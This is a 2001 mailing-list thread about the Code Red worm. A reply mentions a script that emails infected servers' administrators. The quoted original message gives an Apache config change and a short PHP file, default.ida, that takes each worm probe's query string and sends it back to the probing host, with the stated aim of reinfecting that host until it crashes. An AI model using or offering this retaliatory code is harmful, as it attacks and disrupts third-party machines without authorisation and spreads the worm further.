[olug] Code red
Jeremy Bettis
jeremyb at hksys.com
Wed Aug 15 17:58:28 UTC 2001
I installed this perl script on my site:
http://www.dasbistro.com/default.ida
It emails the server administrator, and let's them know they are infected.
----- Original Message -----
From: "Brian Roberson" <brian at bstc.net>
To: <olug at bstc.net>
Sent: Tuesday, August 14, 2001 6:16 PM
Subject: [olug] Code red
> I've been asked multiple times what I am doing about the code red worm (
> and it predecessor ), so here is my story....
>
>
>
> Update your httpd.conf to include the extension .ida as a php file ( you
> have php installed right? ;-)
>
> E.g.
> #########
> AddType application/x-httpd-php .php .php3 .ida
> #########
>
>
>
> And create this nifty little file, named default.ida in the root of your
> web server directory:
>
> ##########################################
> <?
> $junk = getenv("QUERY_STRING");
> $infected = getenv("REMOTE_ADDR");
> $fp = fsockopen("$infected",80);
> fputs($fp, "GET /default.ida?$junk\r\n");
> fclose($fp);
> ?>
> ##########################################
>
>
> Apparently you can infect a box multiple times, and eventually it will
> crash itself ;-)
>
>
>
>
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: olug-unsubscribe at bstc.net
> For additional commands, e-mail: olug-help at bstc.net
>
>
---------------------------------------------------------------------
To unsubscribe, e-mail: olug-unsubscribe at bstc.net
For additional commands, e-mail: olug-help at bstc.net
More information about the OLUG
mailing list